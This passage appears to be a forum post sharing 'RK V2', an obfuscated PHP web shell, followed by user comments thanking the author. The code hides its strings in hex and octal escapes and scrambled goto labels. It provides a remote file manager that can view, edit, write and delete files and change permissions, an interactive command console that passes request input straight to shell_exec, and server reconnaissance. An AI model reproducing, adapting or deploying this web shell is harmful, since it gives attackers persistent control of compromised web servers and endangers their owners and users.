substr(sprintf("\x25\157", $fileinfo->getPerms()), -4); echo "\x3c\x74\x72\76\74\x74\x64\76\x5b\x3c\x61\x20\x68\x72\145\146\x3d\42\77\x70\141\x74\x68\x3d" . $path . "\57" . $fileinfo->getFilename() . "\x22\76" . $fileinfo->getFilename() . "\x3c\x2f\x61\x3e\x5d\74\57\164\x64\76\x3c\x74\x64\x3e\x3c\x61\x20\150\162\x65\x66\75\42\x3f\x70\x61\164\150\x3d" . $path . "\57" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\143\154\x61\163\163\x3d\42\x66\141\x20\x66\141\x2d\x65\171\145\42\x3e\74\x2f\141\76\74\x2f\x74\144\76\74\x74\x64\x3e\x3c\57\164\144\x3e\x3c\164\144\76\x3c\x61\40\x68\162\145\x66\75\x22\77\x61\143\x74\x69\x6f\x6e\75\x64\164\144\x26\160\141\164\x68\75" . $path . "\x2f\46\146\x69\x6c\145\x3d" . $fileinfo->getFilename() . "\42\x3e\74\151\40\143\154\x61\x73\x73\x3d\x22\146\x61\x20\x66\x61\x2d\x78\x69\x6e\147\x22\x3e\x3c\x2f\141\x3e\74\57\x74\x64\76\74\164\x64\76\x3c\163\160\x61\156\40\151\x64\75\42\160\x65\x72\x6d\x73\x22\x3e\74\141\x20\x68\x72\145\x66\75\152\x61\166\x61\163\143\x72\151\160\164\72\143\x68\x6d\157\144\x28\42" . $path . "\x2f" . $fileinfo->getFilename() . "\42\x29\76" . $octal_perms . "\74\57\141\x3e\x3c\x2f\x73\160\141\x6e\x3e\74\57\164\x64\76\74\x74\x64\x3e" . date("\x46\x20\144\40\131\40\x48\72\x69\x3a\163\x2e", filemtime($path . "\57" . $fileinfo->getFilename())) . "\74\57\164\144\x3e\x3c\164\x64\76\104\151\x72\x3c\x2f\x74\144\x3e\x3c\x2f\164\x72\76\12"; } } foreach ($iterator as $fileinfo) { if ($fileinfo->isFile()) { $octal_perms = substr(sprintf("\45\x6f", $fileinfo->getPerms()), -4); $msize = filesize($path . "\57" . $fileinfo->getFilename()); $msize = $msize / 1000; $size = "{$msize}"; $size = str_replace("\56", "\x2c", $size); $size = str_replace("\x30\54\x30", '', $size); $size = str_replace("\x30\54", '', $size); echo "\74\x74\162\76\74\164\x64\x3e\74\x61\40\150\162\145\x66\75\x22\x3f\x61\143\x74\151\x6f\x6e\x3d\166\167\x26\x70\141\x74\x68\x3d" . $path . "\x26\146\x69\x6c\x65\75" . $fileinfo->getFilename() . "\x22\x3e" . $fileinfo->getFilename() . "\74\57\x61\76\x3c\57\164\x64\x3e\74\164\144\x3e\74\141\x20\150\x72\145\146\75\42\x3f\141\x63\x74\x69\157\156\x3d\x76\x77\x26\160\x61\x74\150\75" . $path . "\x26\146\151\154\145\75" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\x63\154\141\163\x73\x3d\42\x66\141\40\146\141\x2d\145\171\x65\x22\x3e\x3c\57\141\x3e\x3c\x2f\x74\144\76\x3c\164\x64\x3e\x3c\141\x20\x68\x72\145\146\75\x22\x3f\141\x63\x74\x69\x6f\156\x3d\145\x64\46\x70\x61\164\x68\75" . $path . "\x26\146\x69\x6c\x65\75" . $fileinfo->getFilename() . "\x22\76\74\151\40\143\x6c\x61\163\163\75\x22\146\141\40\x66\x61\55\160\145\156\143\151\x6c\42\76\74\x2f\x61\x3e\x3c\57\164\144\76\74\164\x64\76\74\141\x20\150\162\x65\x66\x3d\42\x3f\x61\143\x74\x69\x6f\156\75\x64\x74\46\x70\x61\164\x68\x3d" . $path . "\57\46\x66\151\x6c\145\75" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\143\154\141\163\163\x3d\x22\x66\141\x20\x66\x61\55\x74\151\x6d\145\x73\x2d\x63\151\x72\143\154\145\42\76\x3c\x2f\141\76\x3c\x2f\164\144\x3e\x3c\164\144\x3e\74\163\160\x61\156\40\151\x64\x3d\42\160\x65\x72\x6d\x73\42\76\74\141\x20\150\162\145\x66\x3d\152\x61\x76\x61\163\143\162\x69\160\164\72\143\150\x6d\157\144\50\42" . $path . "\x2f" . $fileinfo->getFilename() . "\x22\x29\76" . $octal_perms . "\x3c\x2f\x61\76\x3c\57\x73\160\x61\x6e\x3e\74\x2f\164\x64\x3e\x3c\x74\144\x3e" . date("\x46\x20\x64\x20\131\x20\110\x3a\x69\x3a\x73\56", filemtime($path . "\x2f" . $fileinfo->getFilename())) . "\x3c\x2f\x74\144\76\74\164\144\x3e" . $size . "\40\x42\x79\164\145\163\74\57\164\x64\x3e\x3c\x2f\x74\162\x3e\xa"; } } echo "\74\x2f\164\x61\142\154\145\x3e"; ?>
<div align="center"border="0"style="position:fixed;width:100%;height:25px;z-index:0;top:250px;left:0"id="loading"valign="center"><div align="center"border="1"style="opacity:.7;width:110px;height:25px;z-index:1;border-collapse:collapse"><img id="logoRK"src="https://i.hizliresim.com/4ft8t6j.png"width="80vw"></div></div><script>var ld=document.all,ns4=document.layers,ns6=document.getElementById&&!document.all,ie4=document.all;function init(){ns4?ld.visibility="hidden":(ns6||ie4)&&(ld.display="none")}ns4?ld=document.loading:ns6?ld=document.getElementById("loading").style:ie4&&(ld=document.all.loading.style)</script><style>.RKcolor,.RKcolor tbody,.RKcolor tr{padding:0;border-collapse:collapse;margin:0;font-size:15px}.RKcolor{margin:10px 0}.RKcolor tbody tr:nth-child(2n){background:0 0}.RKcolor tbody tr:nth-child(2n+1){background:#000}.RKcolor tbody tr:hover{background:#8b0000}.RKcolor thead th{text-align:left}.RKcolor thead tr{background-color:#101010}.RKcolor{box-shadow:1px 10px 1px 1px #000}.RKcolor thead th{padding:4px 3px}</style><style>.social{text-align:center;padding-bottom:25px}.social>a{font-size:24px;width:40px;height:40px;display:inline-block;text-align:center;margin:0 8px;color:inherit;opacity:.75;text-decoration:none}.social>a:hover{opacity:.9}</style><div class="social"><a href="https://www.youtube.com/@difaiteam2214"class="fa fa-youtube"></a><a href="https://www.t.me/difaiteam"class="fa fa-telegram"></a><a href="https://www.instagram.com/difaiteam/"class="fa fa-instagram"></a><a href="https://twitter.com/DifaiTeam"class="fa fa-twitter"></a><a href="https://difai-team.org/"class="fa fa-internet-explorer"></a><br><b>RK</b> v<?php  echo $version; ?>
❤️ © <b>2023</b></div><?php  } goto Y_lnB; FhBNm: if (strtoupper(substr(PHP_OS, 0, 3)) === "\x57\111\x4e") { $oz = "\167\151\156"; } else { $oz = "\154\x69\156\165\170"; } goto eDtI2; mN878: echo "\123\145\162\166\145\x72\40\x20\x20\x20\40\x3a\40" . PHP_OS . "\x20\40\x20\x20\xa"; goto punMk; x960h: echo $version; goto s1bmf; TLmke: if ($action == "\122\113\x63\155\x64") { ?>
<div id="shell"></div><script>function line(t){null==t&&(t="/i/dont/know"),t=t,statement=t.replace(/\n/g,"")+'</font>><span id="command" onkeypress="runScript(event)"></span>',document.getElementById("shell").innerHTML+=statement,document.getElementById("command").contentEditable=!0,document.getElementById("command").focus()}function runScript(t){13==t.keyCode&&(exec(),document.getElementById("command").contentEditable=!1,document.getElementById("command").id="done",backup=path)}function exec(){command=document.getElementById("command").innerHTML,xmlhttp.open("POST",document.location,!0),xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("command="+command.replace(/&/g,"%26")+"&path="+path.replace(/&/g,"%26")),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&(results=xmlhttp.responseText.replace("\n","").split(<?php  if ($os == 1) { echo "\42\122\141\x6d\x69\x6c\113\x65\x6e\141\x6e\40\x22"; } else { echo "\x22\x52\x61\x6d\x69\154\113\145\156\x61\x6e\x22"; } ?>
),path=results[1],result=results[0],result=result.replace(/&lt;/g,"<"),result=result.replace(/&gt;/g,">"),null==path&&(path=backup),statement="<pre>"+result+"</pre>",document.getElementById("shell").innerHTML+=statement,line(path))}}function start(){xmlhttp.open("POST",document.location,!0),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&(path=xmlhttp.responseText,line(path))},xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("start=1")}window.XMLHttpRequest?xmlhttp=new XMLHttpRequest:xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"),start()</script><?php  } goto t8g2g; v2oIV: if (isset($_POST["\x73\x74\141\162\x74"])) { if ($os == 1) { $command = "\x63\x64"; } else { $command = "\x70\x77\144"; } $output = shell_exec($command); echo $output; die; } goto Y5Cfd; gG72o: if (isset($_POST["\x61\x63\164\151\x6f\x6e"])) { if (isset($_POST["\x70\141\164\150"])) { if (isset($_POST["\x6d\157\x64"])) { $mod = intval($_POST["\x6d\x6f\x64"], 8); chmod($_POST["\x70\x61\164\x68"], $mod); die; } } } goto FhBNm; punMk: echo "\x53\x65\162\x76\x65\162\x20\111\120\40\101\x64\144\x72\x65\x73\163\72\x20" . $_SERVER["\x53\x45\122\x56\x45\122\x5f\x41\x44\x44\x52"] . "\12"; goto XFUqL; fYFxQ: echo $version; goto QdWZp; SifmQ: if (isset($_GET["\141\x63\164\x69\157\156"])) { $action = $_GET["\x61\x63\164\x69\x6f\x6e"]; } goto l9eU1; eDtI2: $action = "\x66\155"; goto SifmQ; SXHXu: echo "\x3c\57\164\144\x3e\74\x2f\x74\x72\76\x3c\57\x74\141\142\154\145\x3e"; goto TLmke; S3xnm: echo "\x53\145\x72\x76\x65\162\x20\304\xb0\x73\164\x69\146\141\x64\311\231\303\247\151\163\x69\40\x20\x20\x3a\x20" . get_current_user() . "\40\x20\40\40\12"; goto mN878; ESMp_: if ($action == "\x66\x73") { $path = $_GET["\x70\141\x74\x68"]; $command = $_GET["\x63\x6d"]; $command = str_replace("\x61\155\x70\x3b", '', $command); $command = str_replace("\x26\x6c\x74\73", "\x3c", $command); $command = str_replace("\x26\x67\164\73", "\x3e", $command); $command = str_replace("\12", '', $command); $path = str_replace("\xa", '', $path); shell_exec("\143\144\x20" . $path . "\x20\46\x26\x20" . $command); echo "\x3c\x73\x63\x72\151\160\x74\x3e\144\x6f\x63\x75\155\145\156\164\x2e\154\x6f\143\x61\x74\151\157\156\x3d\42\77\x70\141\x74\150\75" . addslashes($_GET["\x70\x61\164\150"]) . "\x22\73\x3c\57\163\143\162\151\160\x74\x3e"; } goto nF9sf; nF9sf: if ($action == "\144\164\144") { if (isset($_GET["\160\141\x74\150"])) { if (isset($_GET["\x66\x69\154\145"])) { rmdir($_GET["\x70\x61\x74\150"] . $_GET["\146\151\x6c\145"]); echo "\x3c\163\x63\162\151\160\x74\x3e\144\x6f\x63\165\x6d\x65\156\x74\56\154\157\x63\141\164\151\x6f\156\x3d\42\x3f\160\141\164\150\x3d" . addslashes($_GET["\160\x61\x74\x68"]) . "\x22\x3b\74\57\x73\x63\162\151\160\164\x3e"; } } } goto uI9wB; XFUqL: echo "\x50\x72\157\161\x72\x61\155\40\x74\311\231\155\x69\x6e\x61\164\xc4\261\40\72\x20" . $_SERVER["\x53\105\122\126\105\122\x5f\x53\117\x46\x54\x57\101\122\105"] . "\xa"; goto SXHXu; IAH_A: error_reporting(0); goto qvgxc; uI9wB: if (strtoupper(substr(PHP_OS, 0, 3)) === "\127\x49\x4e") { $os = 1; $dd = "\143\144"; } else { $os = 2; $dd = "\160\x77\x64"; } goto v2oIV; s1bmf: ?>
<a href="?"><img id="logoRK"src="https://i.hizliresim.com/4ft8t6j.png"width="80vw"></a><?php  goto OtRTt; iGNqy: if ($action == "\145\144") { $path = ''; $file = ''; if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\160\141\x74\x68"] . "\x2f"; } if (isset($_GET["\146\151\154\145"])) { $file = $_GET["\x66\x69\x6c\145"]; } $source = file_get_contents($path . $file); echo "\x44\151\x72\145\x63\x74\x6f\x72\x79\x20\x3a\40\74\141\x20\x68\162\145\x66\75\x3f\x70\x61\x74\x68\75{$path}\76{$path}\x3c\x2f\x61\x3e\40\xa"; echo "\106\x69\x6c\145\x6e\141\x6d\145\x20\40\72\x20{$file}\x20\xa"; echo "\106\x75\154\154\x70\x61\x74\150\40\x20\x3a\40{$path}{$file}\40\12\xa"; $source = str_replace("\46\x6c\x74\x3b", "\x26\154\164\73", $source); $source = str_replace("\x26\147\164\x3b", "\46\147\x74\73", $source); $source = str_replace("\x26", "\46\141\155\160\x3b", $source); $source = str_replace("\x3c", "\46\154\x74\x3b", $source); $source = str_replace("\76", "\x26\x67\164\73", $source); $source = str_replace("\x26\147\x74\x3b", "\46\141\x6d\160\x3b\147\164\73", $source); $source = str_replace("\x26\154\164\73", "\46\141\x6d\x70\73\x6c\x74\73", $source); echo "\x3c\x66\x6f\x72\x6d\40\155\x65\164\x68\x6f\x64\x3d\x22\x70\157\163\x74\42\x20\x61\143\164\x69\157\156\75\x22\x6a\x61\166\141\x73\x63\x72\x69\160\164\x3a\145\144\x69\x74\x28\x29\x3b\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\x68\x69\144\x64\x65\156\42\40\x69\144\75\x22\x70\x61\x74\150\x22\40\156\x61\x6d\145\x3d\x22\x70\141\164\x68\42\x20\166\x61\154\x75\145\x3d\42" . $path . $file . "\42\76\74\x73\160\141\156\40\x6e\x61\x6d\x65\x3d\42\163\x6f\x75\162\x63\145\x22\40\151\144\75\x22\163\157\x75\162\x63\145\x22\x20\143\157\x6e\164\x65\156\x74\x65\x64\x69\x74\x61\x62\154\145\75\42\x74\162\165\x65\x22\x3e" . $source . "\74\x2f\x73\160\141\x6e\76\74\x62\x72\76\x3c\x62\x72\76\x3c\142\x72\76\74\151\x6e\160\165\164\x20\164\x79\160\145\75\x22\163\x75\142\x6d\151\x74\42\x3e\x3c\x2f\146\x6f\162\x6d\x3e"; ?>
<script>function edit(){source=document.getElementById("source").innerHTML,source=source.replace(/&/g,"%26"),source=source.replace(/\+/g,"uiiplastzo"),xmlhttp.open("POST","?",!0),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&alert("Saved.")},xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("source="+source+"&path="+document.getElementById("path").value+"&edit=1")}window.XMLHttpRequest?xmlhttp=new XMLHttpRequest:xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")</script><?php  } goto tfkcp; cwKdb: if (isset($_POST["\x65\144\x69\164"])) { $source = $_POST["\163\x6f\165\162\143\145"]; $source = str_replace("\134\x27", "\47", $source); $source = str_replace("\x5c\134", "\134", $source); $source = str_replace("\134\42", "\x22", $source); $source = str_replace("\x26\154\x74\73", "\74", $source); $source = str_replace("\46\147\164\x3b", "\76", $source); $source = str_replace("\x26\x61\x6d\x70\x3b", "\46", $source); $source = str_replace("\165\151\151\x70\x6c\x61\163\x74\x7a\x6f", "\53", $source); $a = $source; echo $a; $myFile = $_POST["\x70\141\x74\x68"]; $fh = fopen($myFile, "\167") or die("\143\141\156\x27\x74\40\x6f\x70\x65\x6e\x20\146\x69\x6c\x65"); fwrite($fh, $a); fclose($fh); die; } goto gG72o; tfkcp: ?>
</body></html>

Kenan54 · 27 Noy 2023

Annihilator · 27 Noy 2023

Əlinizə saliq

DeusNosVidet<>z1 · 27 Noy 2023

elinize sağlık arkadaşlar

Axtar

RK V2 - WebShell #webshell #bypassShell #AzeShell

ramil

ᕦ(►__◄)ᕤ

Qoşulmuş fayllar

Kenan54

Annihilator

DeusNosVidet<>z1

RK V2 - WebShell #webshell #bypassShell #AzeShell

ramil

ᕦ(►__◄)ᕤ

Qoşulmuş fayllar

Kenan54

Annihilator

DeusNosVidet<>z1